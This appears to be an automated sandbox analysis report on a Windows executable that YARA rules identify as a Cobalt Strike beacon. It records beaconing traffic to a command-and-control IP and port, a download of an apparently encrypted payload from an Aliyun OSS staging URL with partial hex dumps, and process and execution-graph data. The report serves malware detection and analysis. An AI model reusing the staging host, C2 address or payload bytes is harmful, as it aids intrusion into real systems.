              Dec 5, 2024 05:31:51.647960901 CET4989010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:51.877716064 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:51.879160881 CET4989010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:51.998954058 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:52.425525904 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:52.476121902 CET4989010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:52.705794096 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:52.755379915 CET4989010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:52.875106096 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.386439085 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.390244961 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.390263081 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.390273094 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.390284061 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.390295029 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.390300035 CET4989010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:53.390333891 CET4989010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:53.390363932 CET4989010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:53.390472889 CET4989010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:53.390503883 CET4989010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:53.494652033 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:53.510113955 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.510133028 CET1020349890202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.614509106 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:53.614583969 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:53.615032911 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:53.734678030 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:55.161597967 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:55.210484028 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:55.438965082 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:55.446449041 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:55.566157103 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:55.991368055 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.038707018 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:56.266686916 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.267390013 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:56.387228966 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.820622921 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.820702076 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.820749044 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.820780993 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:56.821016073 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.821084023 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.821094990 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.821146011 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:56.821146011 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:56.821239948 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:56.821239948 CET4989710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:56.932045937 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:56.941600084 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:56.941613913 CET1020349897202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:57.051881075 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:57.052005053 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:57.052366972 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:57.172022104 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:58.612778902 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:58.663623095 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:58.899168015 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:58.944856882 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:58.947935104 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:59.067743063 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:59.499847889 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:59.554454088 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:59.789329052 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:59.789984941 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:59.909811020 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.344559908 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.344671011 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.344681978 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.344727039 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:32:00.345010042 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.345057964 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:32:00.345062971 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.345073938 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.345113993 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:32:00.345397949 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:32:00.345426083 CET4990710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:32:00.463332891 CET4991710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:32:00.465008974 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.465029001 CET1020349907202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.583081961 CET1020349917202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:00.583158970 CET4991710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:32:00.583518028 CET4991710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:32:00.703205109 CET1020349917202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:02.143742085 CET1020349917202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:02.194844961 CET4991710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:32:02.430327892 CET1020349917202.175.7.146192.168.2.4
              Dec 5, 2024 05:32:02.476109982 CET4991710203192.168.2.4202.175.7.146
              TimestampSource PortDest PortSource IPDest IP
              Dec 5, 2024 05:29:55.785387039 CET5578053192.168.2.41.1.1.1
              Dec 5, 2024 05:29:56.088558912 CET53557801.1.1.1192.168.2.4
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Dec 5, 2024 05:29:55.785387039 CET192.168.2.41.1.1.10x7562Standard query (0)leganse.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Dec 5, 2024 05:29:56.088558912 CET1.1.1.1192.168.2.40x7562No error (0)leganse.oss-cn-hangzhou.aliyuncs.com118.31.219.225A (IP address)IN (0x0001)false
              • leganse.oss-cn-hangzhou.aliyuncs.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.449730118.31.219.2254436260C:\Users\user\Desktop\31#U544a.exe
              TimestampBytes transferredDirectionData
              2024-12-05 04:29:58 UTC86OUTGET /update.json HTTP/1.1
              accept: */*
              host: leganse.oss-cn-hangzhou.aliyuncs.com
              2024-12-05 04:29:59 UTC475INHTTP/1.1 200 OK
              Server: AliyunOSS
              Date: Thu, 05 Dec 2024 04:29:58 GMT
              Content-Type: application/octet-stream
              Content-Length: 309273
              Connection: close
              x-oss-request-id: 67512C461AFF65313386C0C5
              Accept-Ranges: bytes
              ETag: "C0275DE5D58C059C24614E81F1FA9E7A"
              Last-Modified: Thu, 05 Dec 2024 03:14:16 GMT
              x-oss-object-type: Normal
              x-oss-hash-crc64ecma: 1854888355319726081
              x-oss-storage-class: Standard
              Content-MD5: wCdd5dWMBZwkYU6B8fqeeg==
              x-oss-server-time: 11
              2024-12-05 04:29:59 UTC3621INData Raw: 49 5e 67 48 bf 43 4a f8 6e f7 e1 e9 04 14 32 4b 4b cb e4 dd 5c 12 57 b7 35 d2 bc 02 15 2d 82 be 6d cd a1 6b a9 de 58 4d 5a 29 15 77 ad 0b f2 af 72 a2 6e 4d b7 59 86 75 68 2e 2e 89 3d 49 e1 51 5a ca 89 88 69 76 fb ef 75 9d 4d 38 b0 17 3d 85 a5 cc fb f6 ef a8 cc 9b 17 dd 39 8c 88 5f 4d 5c 48 7c 5f 1d 65 1c 0b 0f de 80 bd 7f 05 c0 49 a7 e7 83 ec b5 f1 3a 5f b8 96 e0 68 bc 49 c2 05 4c 8f cf 94 d5 d8 20 a4 a1 f5 c9 d2 40 c3 cd a3 a8 88 85 5d 35 aa 6d b6 17 61 a1 ab 8e 58 34 92 a2 70 5e a5 e4 83 19 60 f7 c9 a3 38 4a a0 b9 38 72 c1 25 97 db 56 cf 83 6c e9 84 89 80 cd 61 66 fd b0 65 4e 46 b4 41 79 16 01 e3 cf a8 3c 78 00 34 98 3e 87 e3 c7 b6 1a 4d 16 1e bf 65 e0 dd f5 4a 3c 1a cb d9 4b dc d8 9d 43 cd 8d 2c 0a 8f d6 b4 97 ba 22 0b 44 98 a0 08 94 56 03 ee 6c 6a e9
              Data Ascii: I^gHCJn2KK\W5-mkXMZ)wrnMYuh..=IQZivuM8=9_M\H|_eI:_hIL @]5maX4p^`8J8r%VlafeNFAy<x4>MeJ<KC,"DVlj
              2024-12-05 04:29:59 UTC4096INData Raw: dc 72 df c6 1f 34 9b 76 e3 ee 1a 8d d5 2e ed 3d ed d3 95 83 43 81 ef 95 c1 d2 14 40 c1 c6 22 23 23 61 70 fd 19 bf 27 52 5a ed a4 b1 e3 cc 1e c9 79 2e b8 34 de d2 5a d5 b6 dd 6d 3f 89 f3 d5 aa 1c f2 05 6b 1d f1 52 4c 3c 28 fb bb be 9f dd 97 fe 3d 61 38 13 3a 0a 4e af e8 8f 1b ec bc c0 e1 9b 6c 78 87 12 72 33 70 71 71 a8 a5 ec c5 bf 43 61 3d f5 da ec 89 e9 b2 84 0e e1 47 b1 f5 3b 4b f7 35 f6 7c ab e9 a9 72 ac 5b 46 51 2e 59 fe f8 33 78 1c ba e2 8f e6 f0 b4 a2 67 b4 b6 87 fb 12 77 e0 bb 67 0d 4d 51 fd 0d 0a 21 77 3d e8 9e 8d 10 23 ef b6 57 5f 9b 69 d8 25 8d a5 30 c2 b8 de 22 74 a9 e5 f8 5c ba f5 3f d7 e1 48 02 e1 5e e9 52 f2 a4 65 7d 42 96 e6 38 c5 4c 73 a9 eb 88 b7 c9 8d 2b 8f ba 17 4e 2b d4 50 8a 3e c3 68 21 a6 e5 9a 4f 11 c2 af 86 3e b6 ae fc 22 56 c2 6a
              Data Ascii: r4v.=C@"##ap'RZy.4Zm?kRL<(=a8:Nlxr3pqqCa=G;K5|r[FQ.Y3xgwgMQ!w=#W_i%0"t\?H^Re}B8Ls+N+P>h!O>"Vj
              2024-12-05 04:29:59 UTC4096INData Raw: 86 be e2 2f 7f 77 b7 a7 2b fa 81 df 9e 8e 10 ac 87 8e 0c f1 39 14 e1 67 b7 20 0f c6 72 ae 10 62 16 b5 96 e7 7c f2 90 68 77 d6 9d 41 c6 60 b5 38 e1 3e 0a 77 c1 e4 d0 0a 5a ed 10 ea 8d 8f 3b b0 4a 95 3d ad 0a fa cb 3f d6 bf 70 02 ab 52 6d fc 43 2d e8 f3 81 67 e2 49 8b 15 f4 20 95 55 30 91 4f 98 76 7f 7c be 34 2e 47 49 ed f7 62 77 6f 9a ba 04 83 44 4f 5b fd 2d 0c 5f e9 c7 29 0c a5 87 7d 06 b9 35 cf 66 b2 a7 88 25 b7 ec 65 86 7d 54 09 1c 2a 09 2e 54 19 2e 58 2e 73 e6 45 dc da b3 6e 44 14 1a 20 3c c0 69 05 01 7c fd 6c fe c5 21 25 ec c1 fc ac d7 39 e2 76 ad 66 e3 55 04 ee a3 a7 46 8d 91 0f 25 9d af 01 c8 3f b6 66 ae 28 61 f3 fa 92 3a 38 9a c7 11 bf 83 db 25 54 f8 f0 3e 62 6c 16 16 8c 83 a2 26 eb d8 d3 24 dd e7 f8 1f 04 8a ad b1 26 13 78 bd cc 81 51 50 e2 34 eb
              Data Ascii: /w+9g rb|hwA`8>wZ;J=?pRmC-gI U0Ov|4.GIbwoDO[-_)}5f%e}T*.T.X.sEnD <i|l!%9vfUF%?f(a:8%T>bl&$&xQP4
              2024-12-05 04:29:59 UTC4096INData Raw: 5c 54 02 43 44 02 6c f9 25 70 d6 5f 7b 3f b8 6d fd 52 91 db 68 eb 74 0a 35 79 d0 0b 1a e6 73 4f 3b 61 b5 ba 65 3c dc d0 2b ad ed bb 36 f8 21 6d a2 57 de c8 b6 ce 35 82 82 79 b0 3d 26 57 9e 35 e4 90 c5 54 4a 30 f1 66 ec ed 20 a2 26 21 71 67 2c 3d cf 66 6e 4a aa d9 be 0e 35 fb 6e 3e d3 8a 15 43 8c 42 d9 0a 9b 5a 1a 31 ec 47 4d 8e cc 4b 6f ca 67 bf 66 21 30 9b f2 94 44 e8 b7 a6 b3 01 75 10 b5 cc 82 e2 b1 05 5c f5 02 05 59 15 2f fc e7 35 99 fd a2 b1 55 ea 67 81 1e c0 34 70 9c 29 f9 ea 79 af 73 67 8a 57 4c 8f 9e 9e 51 34 13 ec ba a9 2a 5a 5c e8 07 bf 84 14 15 bb bf 8c 67 9d b2 34 fc 76 a7 b5 df 69 3c 52 3e 8e 31 56 b9 54 d8 19 bf 8f a8 3c 01 5d ff f7 17 f6 f1 83 f2 f7 62 6c 85 83 78 69 23 14 02 35 b6 ca 7c c7 d7 3e 35 a5 8c 66 eb 42 e3 ee 1d aa 42 fc 9d b6 a3
              Data Ascii: \TCDl%p_{?mRht5ysO;ae<+6!mW5y=&W5TJ0f &!qg,=fnJ5n>CBZ1GMKogf!0Du\Y/5Ug4p)ysgWLQ4*Z\g4vi<R>1VT<]blxi#5|>5fBB
              2024-12-05 04:29:59 UTC4096INData Raw: 20 9e 1f 7c 97 e2 f9 6d 26 25 11 32 96 e4 34 a9 e7 e0 f6 ba 36 2b 7d 0d 27 6a da 3d 6f 03 b8 6c b6 be 1a ca 6a 96 9b 4d f6 c0 44 cd 8e 7d 62 51 74 39 73 3e cd cb 7e 3b 2b 03 07 77 2a 88 0b 0f d3 ea 36 9c d8 fc 14 28 3a e7 37 63 5a 84 60 b0 6e fe 96 13 38 4c a6 49 81 6c d0 be ac f9 85 1e a3 35 8a d3 18 51 df d3 c8 c5 2f 8c 2b 9a fa 47 c8 8a 33 b6 60 21 c9 b6 85 0b e3 c6 a5 93 01 c2 cd 13 2d 0c aa 06 70 b2 a2 7f 23 69 9b 69 0e 05 a3 af 62 bd 1a 5a 34 cd d4 9f d3 42 cb 1c dd 4e 43 38 e2 98 f2 bf 8b 1b 02 49 d9 54 d2 10 a6 23 fd cd ca 58 1d f6 c8 bf 64 74 7f eb 8a 56 6a 63 b0 4a 9c b3 f9 dc 34 e4 db 07 e4 50 70 c8 e7 69 0c 17 9a b5 58 0c 61 af 4d 37 f9 e3 12 bc 0d 22 9f 4a 90 4d a5 f6 f8 2d 91 b0 3a dc c6 61 75 1e b1 a8 28 31 3a b0 46 57 78 4e 53 f4 cd bc 87
              Data Ascii: |m&%246+}'j=oljMD}bQt9s>~;+w*6(:7cZ`n8LIl5Q/+G3`!-p#iibZ4BNC8IT#XdtVjcJ4PpiXaM7"JM-:au(1:FWxNS
              2024-12-05 04:29:59 UTC4096INData Raw: a5 fd 0b a0 40 2e 06 9b 88 b8 3e 97 93 54 a5 18 b3 ff c8 d4 5c ac 21 d8 0b 42 6f 31 0e 69 06 b1 25 bf dd 74 e3 29 3d 76 39 df b6 78 54 c6 7c d7 a8 e1 6f 06 90 bb 3b 4a ea e9 a1 7b cc 65 d0 3b 81 1f 44 5d 07 26 31 d7 ab 3b be 0e 9c 01 3d a4 e2 c1 b3 be a5 46 c8 cd ca b1 50 c4 7e 45 59 ed d9 a2 df 61 d1 eb 7b 05 d3 32 5a 60 8b e9 d3 98 80 d0 b6 7f 5f 2c 93 26 5a 1f 1c 9e 9e 19 24 99 51 3f 39 e7 1e 46 13 3d 5e 5e 05 d5 54 65 5d bf 63 03 3d 6d a0 ae ec 30 19 6a 15 16 71 81 19 60 33 53 e0 89 46 d2 4d 9d 00 cb ec 62 f2 64 09 0d e9 e9 f4 a0 ab 14 78 2a 92 50 18 7c 95 50 64 2a c1 f5 3d dc d0 85 f9 c8 e1 8f d6 9d a4 3c de 87 c0 bb 29 4b c7 a3 e0 f2 fa 71 a4 82 93 e0 57 cc fd 25 23 30 8a 2f b3 09 c5 5e 88 07 3e 93 b2 81 9b 9c 3d bf 65 92 99 22 17 8a 24 43 78 5a 1b
              Data Ascii: @.>T\!Bo1i%t)=v9xT|o;J{e;D]&1;=FP~EYa{2Z`_,&Z$Q?9F=^^Te]c=m0jq`3SFMbdx*P|Pd*=<)KqW%#0/^>=e"$CxZ
              2024-12-05 04:29:59 UTC4096INData Raw: 85 8a 03 d1 1f b3 fa 3f 67 ab dd 7a 63 cc f6 73 dc a0 17 26 94 db 62 d4 80 16 21 d7 96 f5 fe a4 2b 15 ad ed 73 fe b2 84 5d ce ec 7f a8 e8 5b 5d cc 71 55 f1 5d 41 1a 43 f0 8c 8a ad 5e 60 ad 2f d4 59 1e 11 e3 b4 4c 60 0d 19 69 5f 24 d4 87 b2 d9 e5 ea 71 5b 41 16 3f ce 86 e0 32 6d 25 2b 51 55 11 c1 e8 6c 7b 89 3d 15 c9 e8 5d 7c 19 28 ff 20 69 dd b2 0d 40 6f 1e 77 73 e1 3b fb 41 16 27 28 50 20 53 94 17 8f 89 c0 1b 09 35 d8 18 ee 7f 4d 6e f8 6e 0d d3 97 62 0f 3c e1 82 66 c8 27 cd 4d 46 4e 31 db f2 dd 50 ba 2d 76 55 99 87 45 33 5a 03 71 aa 55 bc cc f0 87 73 02 36 da 07 13 62 74 2d 4a fb 14 8d 97 48 7e 72 df 8f 61 4e 73 07 e0 6c f8 46 44 f6 aa ac 34 bb 02 85 38 3a 6c db 38 5e fe 16 97 5a ba 35 a7 3e 48 53 58 8c 81 b3 76 cb 6f 03 27 c7 41 e9 82 c3 9b 99 4a 55 da
              Data Ascii: ?gzcs&b!+s][]qU]AC^`/YL`i_$q[A?2m%+QUl{=]|( i@ows;A'(P S5Mnnb<f'MFN1P-vUE3ZqUs6bt-JH~raNslFD48:l8^Z5>HSXvo'AJU
              2024-12-05 04:29:59 UTC4096INData Raw: 4a 10 62 54 8c db 2b d6 26 69 60 e4 34 4b bb 66 bd 22 e5 15 60 87 fb db 0a d6 5e 57 b7 ce a8 86 4f e0 20 65 e7 47 b3 82 57 4c db 6e 73 72 0f 0e 7b 5d a7 6e 07 19 36 17 1f 48 d6 80 d1 cb 29 52 26 08 ca 98 3c 8d 99 ef 1c 8e ae 71 78 1d 2e 49 18 ef df b7 a2 28 bb 03 d1 a9 95 69 ea 41 25 e0 28 1f 57 db f4 86 71 68 98 89 b2 23 a8 0a cd 1c d7 fb cf 13 d1 54 d5 1e 0e 07 5a 25 ef 30 93 cf e4 61 bc cc 50 ba c3 56 f6 a7 63 96 19 6c a1 76 42 f3 0d d2 25 da 09 b5 9f e2 d2 5b e5 9f 52 ba 05 4e fc 34 63 4e 74 61 a0 9a 3c ba 9e a5 d4 38 26 f8 56 97 16 e4 a9 84 05 e9 d6 15 9c 0b 23 6f 85 bd 8a 92 fd fc a1 61 01 2e e0 77 34 f5 9c 0c c3 46 e3 ab 3e 0a e2 a6 d7 3e 93 98 6b 6e a8 ca dd ce d5 a3 e1 45 e0 c7 d1 57 17 c3 9a c7 d2 ec 72 98 c6 ac 86 a9 9f ca 70 92 4a 9d ee 64 bc
              Data Ascii: JbT+&i`4Kf"`^WO eGWLnsr{]n6H)R&<qx.I(iA%(Wqh#TZ%0aPVclvB%[RN4cNta<8&V#oa.w4F>>knEWrpJd
              2024-12-05 04:29:59 UTC4096INData Raw: 97 c7 fc 6a 7b ee 62 f0 78 68 58 a4 d5 ee a2 88 cb 4f 7c c3 a2 12 3f b6 c3 79 17 13 c5 76 b5 a7 da a1 39 47 8a fa dc b9 75 69 f5 80 0a ab 5a 9c df e1 e4 f2 1d 50 30 ed 3f 5f 60 7c 93 00 4e 71 fe 6d f9 75 97 22 94 2d ac 85 11 e4 e6 cb c2 d3 66 8a b6 49 ad 53 1e 53 09 52 0c b3 5a 45 26 c5 07 e8 18 db 1c cf 7e 10 fe 0b 84 c6 2f eb d0 dd 95 12 a7 54 c1 31 72 63 db c1 6a a6 37 17 a0 d9 53 1f 65 1d bc 10 58 ae 7a f9 33 24 9c 12 e6 60 be 0e dc c4 f4 f9 4a e6 77 6e 92 4c 14 c4 cc c8 b4 55 f4 b2 e0 2d aa c9 6a c1 ec 51 09 b4 bf 43 b3 06 23 a3 8a a2 29 20 c6 57 05 c7 a9 10 42 fc 1c cc 67 9d 17 af 2a c7 dc 7e f6 aa ed 6c 94 3e 10 ee 61 31 2b 3a f7 c7 62 70 2f 9c 6e cc 49 ee 39 c3 75 43 a6 95 39 ce 36 ae 0a fc 24 f8 82 c1 26 7a c9 47 bb 8a b4 b2 a3 6c 8a ad 12 0a 47
              Data Ascii: j{bxhXO|?yv9GuiZP0?_`|Nqmu"-fISSRZE&~/T1rcj7SeXz3$`JwnLU-jQC#) WBg*~l>a1+:bp/nI9uC96$&zGlG
              2024-12-05 04:29:59 UTC4096INData Raw: 18 5d bc 33 d4 2b 6d 49 ce d1 bc 5b 45 12 ef 99 82 9c f8 7a 0e ee 71 44 48 fb 5d 32 2a 00 3e b6 f4 16 3c a2 7a b1 43 60 e9 4c 80 8c f7 e5 d6 0e 0f 4a 4c 6c d1 57 d0 bc cb 87 a8 27 09 7e 3b ea 3e 4e 03 47 02 2e 81 f3 f4 76 56 47 a7 90 ba eb 37 4b c2 ec a0 81 d7 93 18 6e 4c e5 1b 11 08 17 03 f4 fa 4d 46 b0 4d 0d 0d 58 a1 3f 18 52 44 6a 0a b1 a1 84 c9 ae 2b 45 71 56 2a 49 71 2b 92 3d 40 56 af 05 a0 67 19 04 1b 76 b4 45 23 fd 54 69 f9 65 5a ca 0f a6 7b 8b f7 3b 3e d0 78 68 0e 2d c0 d7 69 ee 3b 24 b7 da 2a 57 a6 71 72 d5 04 73 ba c9 84 71 f7 f3 5e 00 bd e5 7b b6 85 7c 65 e1 df 67 76 50 eb 1d 1f 32 07 dc fa 4d 22 37 9b 70 3b 84 f7 b4 0a 28 72 5b 70 ce fa 88 07 51 5b 86 15 02 db 69 64 43 df 47 02 ee af bc 72 be b7 72 a9 cf 96 22 3c e0 f3 27 21 e9 59 6e 5b 2a 2d
              Data Ascii: ]3+mI[EzqDH]2*><zC`LJLlW'~;>NG.vVG7KnLMFMX?RDj+EqV*Iq+=@VgvE#TieZ{;>xh-i;$*Wqrsq^{|egvP2M"7p;(r[pQ[idCGrr"<'!Yn[*-


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Target ID:0
              Start time:23:29:55
              Start date:04/12/2024
              Path:C:\Users\user\Desktop\31#U544a.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\31#U544a.exe"
              Imagebase:0x7ff71a7a0000
              File size:604'672 bytes
              MD5 hash:7D6748D103F78D1A8DDAB5646C5CB1A3
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2905522054.000001912B7A1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:false

              Reset < >

                Execution Graph

                Execution Coverage:4.7%
                Dynamic/Decrypted Code Coverage:31.6%
                Signature Coverage:19.7%
                Total number of Nodes:699
                Total number of Limit Nodes:70
                execution_graph 121183 1912b79136c 121185 1912b791388 _DllMainCRTStartup 121183->121185 121184 1912b791418 121192 1912b7913e2 121184->121192 121232 1912b78891c 121184->121232 121185->121184 121185->121192 121195 1912b79120c 121185->121195 121187 1912b791436 121189 1912b79145f 121187->121189 121191 1912b78891c _DllMainCRTStartup 11 API calls 121187->121191 121190 1912b79120c _CRT_INIT 2 API calls 121189->121190 121189->121192 121190->121192 121193 1912b791452 121191->121193 121194 1912b79120c _CRT_INIT 2 API calls 121193->121194 121194->121189 121196 1912b79129b 121195->121196 121199 1912b79121e _heap_init 121195->121199 121197 1912b7912f1 121196->121197 121201 1912b79129f _CRT_INIT 121196->121201 121198 1912b791354 121197->121198 121205 1912b7912f6 _getptd_noexit 121197->121205 121206 1912b791227 _CRT_INIT 121198->121206 121261 1912b7941dc RtlFreeHeap _freefls _getptd_noexit 121198->121261 121199->121206 121242 1912b794384 RtlFreeHeap 6 library calls 121199->121242 121201->121206 121252 1912b78f834 RtlFreeHeap free 121201->121252 121204 1912b7912c7 121213 1912b7912d6 _CRT_INIT 121204->121213 121253 1912b797c6c RtlFreeHeap free 121204->121253 121205->121206 121256 1912b794e88 RtlFreeHeap _calloc_impl 121205->121256 121206->121184 121209 1912b791233 _RTC_Initialize 121209->121206 121243 1912b798c70 GetEnvironmentStringsW 121209->121243 121210 1912b7912d1 121254 1912b794404 RtlFreeHeap free _mtterm 121210->121254 121213->121206 121255 1912b794404 RtlFreeHeap free _mtterm 121213->121255 121214 1912b791313 _getptd_noexit 121214->121206 121216 1912b79134a 121214->121216 121217 1912b791334 121214->121217 121258 1912b78e744 121216->121258 121257 1912b7942c0 RtlFreeHeap _freefls _lock __addlocaleref 121217->121257 121222 1912b791261 121229 1912b791265 121222->121229 121251 1912b7987d4 RtlFreeHeap __initmbctable parse_cmdline 121222->121251 121250 1912b794404 RtlFreeHeap free _mtterm 121229->121250 121233 1912b7889f7 121232->121233 121237 1912b78893e _DllMainCRTStartup 121232->121237 121314 1912b78a988 121233->121314 121235 1912b788943 _DllMainCRTStartup 121235->121187 121237->121235 121238 1912b7889a1 _DllMainCRTStartup 121237->121238 121326 1912b78c7f8 121237->121326 121263 1912b77ba74 121238->121263 121241 1912b78c7f8 _DllMainCRTStartup VirtualFree 121241->121238 121242->121209 121244 1912b798c9e 121243->121244 121247 1912b791255 121243->121247 121244->121247 121262 1912b794f08 RtlFreeHeap malloc 121244->121262 121246 1912b798cf5 121246->121247 121248 1912b78e744 free RtlFreeHeap 121246->121248 121249 1912b797940 RtlFreeHeap _ioinit _freefls _lock _calloc_crt 121247->121249 121248->121247 121249->121222 121250->121206 121252->121204 121253->121210 121254->121213 121255->121206 121256->121214 121257->121206 121259 1912b78e749 RtlFreeHeap 121258->121259 121260 1912b78e764 _errno _dosmaperr 121258->121260 121259->121260 121260->121206 121261->121206 121262->121246 121330 1912b78552c 121263->121330 121265 1912b77ba92 _DllMainCRTStartup 121337 1912b78e784 121265->121337 121267 1912b77bb40 121348 1912b78b73c 